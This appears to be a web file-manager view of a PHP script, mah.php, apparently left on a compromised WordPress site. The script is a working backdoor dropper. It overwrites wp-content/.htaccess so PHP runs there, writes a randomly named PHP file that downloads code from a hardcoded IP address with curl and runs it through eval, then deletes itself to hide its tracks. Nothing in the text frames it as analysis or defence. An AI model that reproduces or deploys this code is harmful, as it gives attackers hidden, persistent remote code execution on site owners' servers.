trAvis - MANAGER

Edit File: mah.php

<?php ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); function getRandomBytes($length = 5) { if (function_exists('random_bytes')) { return random_bytes($length); } elseif (function_exists('openssl_random_pseudo_bytes')) { return openssl_random_pseudo_bytes($length); } else { $bytes = ''; for ($i = 0; $i < $length; $i++) { $bytes .= chr(mt_rand(0, 255)); } return $bytes; } } $rootPath = $_SERVER["DOCUMENT_ROOT"]; $wpContentPath = $rootPath . DIRECTORY_SEPARATOR . "wp-content"; if (!is_dir($wpContentPath)) { if (!mkdir($wpContentPath, 0755, true)) { die("Failed to create wp-content directory"); } } $htaccessPath = $wpContentPath . DIRECTORY_SEPARATOR . '.htaccess'; if (!is_dir($wpContentPath)) { if (!mkdir($wpContentPath, 0755, true)) { die("Failed to create wp-content directory"); } } if (file_exists($htaccessPath)) { if (!unlink($htaccessPath)) { } } $htaccessContent = <<<HTACCESS <FilesMatch "\.php$"> Order allow,deny Allow from all </FilesMatch> HTACCESS; if (file_put_contents($htaccessPath, $htaccessContent) !== false) { } $randomName = bin2hex(getRandomBytes(5)) . '.php'; $fullFilePath = $wpContentPath . DIRECTORY_SEPARATOR . $randomName; $phpCode = '<?php $url = "http://51.79.124.111/vz00";$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$tag= curl_exec($ch);curl_close($ch);eval("?>" . ("$tag"));?>'; if (file_put_contents($fullFilePath, $phpCode) === false) { die("Failed to write PHP file"); } echo "Testwow<br>wp-content/$randomName</br>"; if (file_exists(__FILE__)) { unlink(__FILE__); } if (file_exists("mah.php")) { unlink("mah.php"); } ?>